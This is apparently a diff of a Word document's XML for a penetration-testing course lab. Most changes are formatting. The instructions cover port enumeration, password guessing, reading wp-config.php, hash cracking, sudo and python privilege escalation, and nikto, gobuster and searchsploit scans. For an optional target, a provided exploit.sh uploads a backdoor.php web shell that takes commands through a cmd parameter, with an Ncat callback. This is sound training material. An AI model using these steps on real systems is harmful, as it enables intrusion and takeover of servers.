--- a/PROJECT-3/Day1.docx
+++ b/PROJECT-3/Day1.docx
@@ -18,7 +18,7 @@
           <w:noProof/>
         </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6687AA73" wp14:editId="31E69B01">
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="237E714E" wp14:editId="44CD7F1F">
             <wp:extent cx="5705475" cy="438150"/>
             <wp:effectExtent l="0" t="0" r="9525" b="0"/>
             <wp:docPr id="1" name="Picture 1"/>
@@ -60,7 +60,7 @@
           <w:noProof/>
         </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0253183F" wp14:editId="1DA13148">
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1A92B489" wp14:editId="0924B14F">
             <wp:extent cx="5943600" cy="4616450"/>
             <wp:effectExtent l="0" t="0" r="0" b="0"/>
             <wp:docPr id="2" name="Picture 2"/>
@@ -108,93 +108,27 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>22/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>tcp</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>ssh</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>80/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>tcp</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> http</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>111/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>tcp</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>rpcbind</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>139/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>tcp</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>smb</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> 3.x</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>445/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>tcp</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>smb</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> 4</w:t>
+        <w:t>22/tcp ssh</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>80/tcp http</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>111/tcp rpcbind</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>139/tcp smb 3.x</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>445/tcp smb 4</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -204,7 +138,7 @@
         </w:rPr>
         <w:lastRenderedPageBreak/>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5DEE6F44" wp14:editId="5F4AFB13">
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5FB2C664" wp14:editId="6871C7FD">
             <wp:extent cx="5943600" cy="4636770"/>
             <wp:effectExtent l="0" t="0" r="0" b="0"/>
             <wp:docPr id="5" name="Picture 5"/>
@@ -256,7 +190,7 @@
           <w:noProof/>
         </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5F181EBD" wp14:editId="2CE91DC7">
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="701210B2" wp14:editId="00176A10">
             <wp:extent cx="5934075" cy="2781300"/>
             <wp:effectExtent l="0" t="0" r="9525" b="0"/>
             <wp:docPr id="7" name="Picture 7"/>
@@ -299,7 +233,7 @@
         </w:rPr>
         <w:lastRenderedPageBreak/>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="28127A78" wp14:editId="1F820B63">
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1D4CA2C9" wp14:editId="200DAAA0">
             <wp:extent cx="5943600" cy="1255395"/>
             <wp:effectExtent l="0" t="0" r="0" b="1905"/>
             <wp:docPr id="6" name="Picture 6"/>
@@ -341,7 +275,7 @@
           <w:noProof/>
         </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="553E584F" wp14:editId="186FD824">
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="475786AE" wp14:editId="03D690CA">
             <wp:extent cx="4848225" cy="581025"/>
             <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
             <wp:docPr id="8" name="Picture 8"/>
@@ -384,15 +318,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">     - **Hint**: Guess `</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>michael</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>`'s password. What's the most obvious possible guess?...</w:t>
+        <w:t xml:space="preserve">     - **Hint**: Guess `michael`'s password. What's the most obvious possible guess?...</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -402,7 +328,7 @@
         </w:rPr>
         <w:lastRenderedPageBreak/>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="71451350" wp14:editId="43B72315">
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="597D451C" wp14:editId="35D13810">
             <wp:extent cx="5153025" cy="5572125"/>
             <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
             <wp:docPr id="9" name="Picture 9"/>
@@ -444,7 +370,7 @@
           <w:noProof/>
         </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3E9F3D4F" wp14:editId="7DFFE42D">
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="36607F13" wp14:editId="2EF7DDC3">
             <wp:extent cx="5934075" cy="1400175"/>
             <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
             <wp:docPr id="10" name="Picture 10"/>
@@ -487,7 +413,7 @@
         </w:rPr>
         <w:lastRenderedPageBreak/>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1CC3FCA9" wp14:editId="79FFE4FF">
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="76033DDB" wp14:editId="7568E75A">
             <wp:extent cx="4171950" cy="1019175"/>
             <wp:effectExtent l="0" t="0" r="0" b="9525"/>
             <wp:docPr id="11" name="Picture 11"/>
@@ -530,24 +456,16 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">     - **Hint**: Look for a `wp-</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>config.php</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>` file in `/var/www/html`.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-        <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6333FA5A" wp14:editId="049D00AE">
+        <w:t xml:space="preserve">     - **Hint**: Look for a `wp-config.php` file in `/var/www/html`.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="54805E02" wp14:editId="5BA3455F">
             <wp:extent cx="3143250" cy="1685925"/>
             <wp:effectExtent l="0" t="0" r="0" b="9525"/>
             <wp:docPr id="12" name="Picture 12"/>
@@ -594,7 +512,7 @@
           <w:noProof/>
         </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5BE93491" wp14:editId="2D50160F">
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="21A934C4" wp14:editId="735A0237">
             <wp:extent cx="5943600" cy="2291080"/>
             <wp:effectExtent l="0" t="0" r="0" b="0"/>
             <wp:docPr id="13" name="Picture 13"/>
@@ -637,7 +555,7 @@
         </w:rPr>
         <w:lastRenderedPageBreak/>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="534A9FCB" wp14:editId="2A491FFF">
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5F13EEF7" wp14:editId="1AC364A8">
             <wp:extent cx="4124325" cy="5305425"/>
             <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
             <wp:docPr id="14" name="Picture 14"/>
@@ -679,7 +597,7 @@
           <w:noProof/>
         </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="50479BF8" wp14:editId="39BD8E63">
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="54F93C39" wp14:editId="78884393">
             <wp:extent cx="2924175" cy="657225"/>
             <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
             <wp:docPr id="15" name="Picture 15"/>
@@ -722,7 +640,7 @@
         </w:rPr>
         <w:lastRenderedPageBreak/>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3D9698D8" wp14:editId="003F45B9">
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1E955BAF" wp14:editId="62EB1706">
             <wp:extent cx="4619625" cy="2962275"/>
             <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
             <wp:docPr id="16" name="Picture 16"/>
@@ -774,7 +692,7 @@
           <w:noProof/>
         </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7671760A" wp14:editId="054FEA11">
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6FDF21D6" wp14:editId="5E21F4B8">
             <wp:extent cx="5943600" cy="1459230"/>
             <wp:effectExtent l="0" t="0" r="0" b="7620"/>
             <wp:docPr id="17" name="Picture 17"/>
@@ -817,44 +735,26 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">      user</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>1:$</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>P$hashvalu3</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">      user</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>2:$</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>P$hashvalu3</w:t>
+        <w:t xml:space="preserve">      user1:$P$hashvalu3</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">      user2:$P$hashvalu3</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:r>
         <w:t xml:space="preserve">      ```</w:t>
       </w:r>
-      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
-      <w:bookmarkEnd w:id="0"/>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-        <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="01811F8E" wp14:editId="26826799">
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="57B618EC" wp14:editId="7FE70D04">
             <wp:extent cx="3571875" cy="723900"/>
             <wp:effectExtent l="0" t="0" r="9525" b="0"/>
             <wp:docPr id="18" name="Picture 18"/>
@@ -890,52 +790,198 @@
         </w:drawing>
       </w:r>
     </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1F98CA1C" wp14:editId="438E5F53">
+            <wp:extent cx="5314950" cy="2971800"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="19" name="Picture 19"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId20"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5314950" cy="2971800"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>8. Secure a user shell as the user whose password you cracked.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2F1446F6" wp14:editId="37F31DDD">
+            <wp:extent cx="5895975" cy="2133600"/>
+            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
+            <wp:docPr id="20" name="Picture 20"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId21"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5895975" cy="2133600"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>9. Escalate to `root`. One flag can be discovered after this step.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">    - **Hint**:  Check sudo privileges. Is there a python command you can use to escalate to sudo?</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="50F3CF62" wp14:editId="2EA3D3E0">
+            <wp:extent cx="5943600" cy="2472690"/>
+            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
+            <wp:docPr id="21" name="Picture 21"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId22"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5943600" cy="2472690"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
     <w:p/>
     <w:p>
       <w:r>
-        <w:t>8. Secure a user shell as the user whose password you cracked.</w:t>
-      </w:r>
-    </w:p>
-    <w:p/>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="010FC764" wp14:editId="5560E7EC">
+            <wp:extent cx="4905375" cy="5038725"/>
+            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
+            <wp:docPr id="22" name="Picture 22"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId23"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="4905375" cy="5038725"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
+      <w:bookmarkEnd w:id="0"/>
+    </w:p>
     <w:p>
       <w:r>
         <w:lastRenderedPageBreak/>
-        <w:t>9. Escalate to `root`. One flag can be discovered after this step.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">    - **Hint**:  Check </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>sudo</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> privileges. Is there a python command you can use to escalate to </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>sudo</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>?</w:t>
-      </w:r>
-    </w:p>
-    <w:p/>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">Try to complete </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>all of</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> these steps. However, you may move on after capturing only _two_ of the four flags if you run out of time.</w:t>
+        <w:t>Try to complete all of these steps. However, you may move on after capturing only _two_ of the four flags if you run out of time.</w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -948,15 +994,7 @@
     <w:p/>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">Please note, you </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>**attacking</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> Target 2 is not required**. It is included as an additional challenge if you are interested in assessing a more complex web application. Before attempting this challenge, you should first complete the Wireshark analysis.</w:t>
+        <w:t>Please note, you **attacking Target 2 is not required**. It is included as an additional challenge if you are interested in assessing a more complex web application. Before attempting this challenge, you should first complete the Wireshark analysis.</w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -977,7 +1015,7 @@
           <w:noProof/>
         </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="332BFFBC" wp14:editId="39FE956E">
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5DEB593F" wp14:editId="28CBBD66">
             <wp:extent cx="5705475" cy="438150"/>
             <wp:effectExtent l="0" t="0" r="9525" b="0"/>
             <wp:docPr id="3" name="Picture 3"/>
@@ -1020,7 +1058,7 @@
         </w:rPr>
         <w:lastRenderedPageBreak/>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1DF1F70B" wp14:editId="6010F3CA">
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2B2DC108" wp14:editId="1553149E">
             <wp:extent cx="5943600" cy="4853940"/>
             <wp:effectExtent l="0" t="0" r="0" b="3810"/>
             <wp:docPr id="4" name="Picture 4"/>
@@ -1035,7 +1073,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId20"/>
+                    <a:blip r:embed="rId24"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -1064,28 +1102,12 @@
     <w:p/>
     <w:p>
       <w:r>
-        <w:t>3. Enumerate the web server with `</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>nikto</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>`.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">     - **Hint**: Run: `</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>nikto</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> -C all -h &lt;URL&gt;`</w:t>
+        <w:t>3. Enumerate the web server with `nikto`.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">     - **Hint**: Run: `nikto -C all -h &lt;URL&gt;`</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1096,15 +1118,7 @@
     <w:p/>
     <w:p>
       <w:r>
-        <w:t>4. Perform a more in-depth enumeration with `</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>gobuster</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>`.</w:t>
+        <w:t>4. Perform a more in-depth enumeration with `gobuster`.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1114,57 +1128,17 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">       - Install `</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>gobuster</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>` using `apt`</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">       - Run: `</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>gobuster</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> -w /path/to/wordlist </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>dir</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> -u &lt;URL&gt;`</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">       - Use `/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>usr</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>/share/wordlists/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>dirbuster</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>/directory-list-2.3-medium.txt` as your wordlist (`-w`).</w:t>
+        <w:t xml:space="preserve">       - Install `gobuster` using `apt`</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">       - Run: `gobuster -w /path/to/wordlist dir -u &lt;URL&gt;`</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">       - Use `/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt` as your wordlist (`-w`).</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1177,50 +1151,18 @@
     <w:p/>
     <w:p>
       <w:r>
-        <w:t>5. Use “</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>searchsploit</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>” to find any known vulnerabilities associated with the programs found in Step #4.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">    **HINT**: Use `</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>searchsploit</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> -h` for some hints here.</w:t>
+        <w:t>5. Use “searchsploit” to find any known vulnerabilities associated with the programs found in Step #4.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">    **HINT**: Use `searchsploit -h` for some hints here.</w:t>
       </w:r>
     </w:p>
     <w:p/>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">6. Use the provided script, `exploit.sh`, to exploit this vulnerability by opening </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>an</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Ncat</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> connection to your Kali VM.</w:t>
+        <w:t>6. Use the provided script, `exploit.sh`, to exploit this vulnerability by opening an Ncat connection to your Kali VM.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1230,28 +1172,12 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">    - Run the script. It uploads a file called `</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>backdoor.php</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>` to the target server. This file can be used to execute **command injection attacks**.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">    - Navigate to: `http://&lt;Target 2 URL&gt;/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>backdoor.php?cmd</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>=&lt;CMD&gt;`</w:t>
+        <w:t xml:space="preserve">    - Run the script. It uploads a file called `backdoor.php` to the target server. This file can be used to execute **command injection attacks**.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">    - Navigate to: `http://&lt;Target 2 URL&gt;/backdoor.php?cmd=&lt;CMD&gt;`</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1261,23 +1187,7 @@
     </w:p>
     <w:p>
       <w:r>
